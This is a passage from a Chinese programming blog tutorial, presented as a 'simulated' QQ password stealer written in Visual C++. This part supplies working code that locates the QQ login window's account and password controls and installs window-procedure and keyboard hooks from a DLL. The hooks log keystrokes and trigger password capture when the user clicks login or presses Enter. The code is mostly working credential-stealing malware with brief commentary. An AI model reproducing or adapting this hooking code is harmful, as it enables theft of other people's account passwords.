龙盟编程博客 | 无障碍搜索 | 云盘搜索神器
快速搜索
主页 > 软件开发 > VC开发 >

盗QQ的密码软件模拟实现(VC)[图](2)

时间:2009-12-30 15:42来源:未知 作者:admin 点击:
分享到:
第二部分:(2)安装钩子 找到了QQ登陆窗口后,就成功了一半。 下面是DLL文件中的安装HOOK的函数SetQQHook(), 为什么要用DLL(动态连接库)?要去“钩”其

  第二部分:(2)安装钩子

  找到了QQ登陆窗口后,就成功了一半。

  下面是DLL文件中的安装HOOK的函数SetQQHook(), 为什么要用DLL(动态连接库)?要去“钩”其他进程的消息,得让HOOK函数在DLL中,这样好映射到其地址空间中!

BOOL WINAPI SetQQHook(HWND hQQLogin)
{
//获得登陆框的句柄
BOOL bRet = FALSE;
if (hQQLogin != NULL)
{
DWORD dwThreadID = GetWindowThreadProcessId(hQQLogin, NULL); //这是什么意思?看MSDN

g_hNum = GetDlgItem(hQQLogin, 138); //不同版本QQ,此处不一样! 得到QQ号的子窗口句柄
g_hPsw = GetDlgItem(hQQLogin, 180);  //不同版本QQ,此处不一样!得到QQ密码的子窗口句柄
if (g_hNum == NULL)
{
MessageBox(NULL,"哭了,号码句柄都没有得到!","郁闷",0);
return FALSE;
}
if(g_hPsw==NULL)
{
MessageBox(NULL,"哭了,密码句柄都没有得到!","郁闷",0);
return FALSE;
}
//分别键盘HOOK,和界面部分消息处理的HOOK
g_hProc = SetWindowsHookEx(WH_CALLWNDPROC, CallWndProc, g_hInstDLL, dwThreadID);
g_hKey = SetWindowsHookEx(WH_KEYBOARD, KeyboardProc, g_hInstDLL, dwThreadID);
bRet = (g_hProc != NULL) && (g_hKey != NULL);
}
else
{
// 卸载钩子
bRet = UnhookWindowsHookEx(g_hProc) && UnhookWindowsHookEx(g_hKey);
g_hProc = NULL;
g_hKey = NULL;
g_hNum = NULL;
}
return bRet;
}

  上面是安装HOOK部分的代码,就这么简单,下面提到了CallWndProc,KeyboardProc是两个回调函数,是我第三部分要解释的钩子函数。

 第三部分:(3)钩子函数的解释

  CallWndProc,KeyboardProc是两个回调函数的原型和具体代码如下:

// 钩子过程,监视“登陆”的命令消息
LRESULT CALLBACK CallWndProc(int nCode, WPARAM wParam, LPARAM lParam)
{
CWPSTRUCT *p = (CWPSTRUCT *)lParam;
// 捕获“登陆”按钮
if (p->message == WM_COMMAND && p->wParam ==16032)
//下面个函数是我在第四部分介绍-“处理密码”部分会仔细说明
//当用户点了登陆按钮,说明QQ号码和QQ密码已经填写完毕,当然可以去获得密码了
GetPasswrod();
return CallNextHookEx(g_hProc, nCode, wParam, lParam);
}

// 键盘钩子过程,监视“登陆”的热键消息
LRESULT CALLBACK KeyboardProc(int nCode, WPARAM wParam, LPARAM lParam)
{
// 捕获热键消息,记录键盘的按键盘过程,pmsg是PMSG类型的,i是全局Static类型的
pmsg[i].wParam =wParam;
i++;
if (wParam == VK_RETURN) //用户使用键盘“回车”来登陆,用户用了回车后,就可以可以去获得密码了
GetPasswrod();
return CallNextHookEx(g_hKey, nCode, wParam, lParam);
}

  在明白了这两个钩子函数后就可以看后期是如何具体处理密码的了,这就是下面的第四部分内容。

精彩图集

赞助商链接